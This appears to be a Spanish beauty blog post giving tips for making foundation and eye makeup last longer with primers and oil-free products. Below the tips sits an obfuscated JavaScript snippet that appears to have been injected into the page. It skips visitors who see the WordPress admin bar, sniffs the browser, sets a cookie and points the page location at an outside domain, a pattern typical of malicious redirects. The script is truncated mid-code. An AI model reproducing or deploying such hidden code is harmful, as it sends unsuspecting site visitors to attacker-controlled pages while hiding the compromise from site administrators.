Todas sabemos lo poco agradable que es maquillarnos todas las mañanas durante un buen rato, salir de casa y darnos cuenta que ese maquillaje que nos quedó tan bonito, al cabo de 4 o 5 horas es casi imperceptible. Esto ocurre por varios factores, entre los cuales está el sudor, el roce, productos de mala calidad, etc.
Para poder alargar nuestro maquillaje y mantenerlo inalterable durante más horas, o que por lo menos no sean necesarios varios retoques a lo largo del día, podemos emplear algunos truquitos que os detallo a continuación:

1. Si empleamos maquillaje fluido, elegiremos en la medida de lo posible un maquillaje de buena calidad y que sea de larga duración. Estos maquillajes tienen por regla general una durabilidad de entre 10 y 12 horas,  tambien es cierto que si empleamos un “PRIMER” delante de el, que lo fije y después de aplicarlo lo sellamos con polvos sueltos o compactos, podemos alargarlo intacto durante bastantes horas. Cuidado con las pieles grasas o mixtas, porque no aguantan tanto el maquillaje porque generan más grasa y tienen tendencia a brillos. Siempre este tipo de pieles deben emplear un maquillaje específico para pieles grasas o mixtas que sea oil-free (libre de aceites), con esto conseguiremos que el producto controle el exceso de grasa en la piel y evitaremos en gran medida los brillos tan anti-estéticos.

2. También alargaremos nuestro maquillaje de ojos, si siempre y como norma general aplicamos antes de las sombras un “PRIMER” específico para ellas. Independientemente de si las sombras que aplicamos son en polvo o en crema hará que se mantenga muchas horas sin moverse. Este tipo de productos son muy cómodos de aplicar ya que necesitamos una pequeñísima cantidad de producto, como un granito de arroz para los dos párpados, Son productos que están testados para esa zona y no suelen dar alergias, así que también lo podemos aplicar en las pestañas inferiores para aplicar la sombra si queremos. 

 ¡Probadlo y me contáis qué os ha parecido! 🙂

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone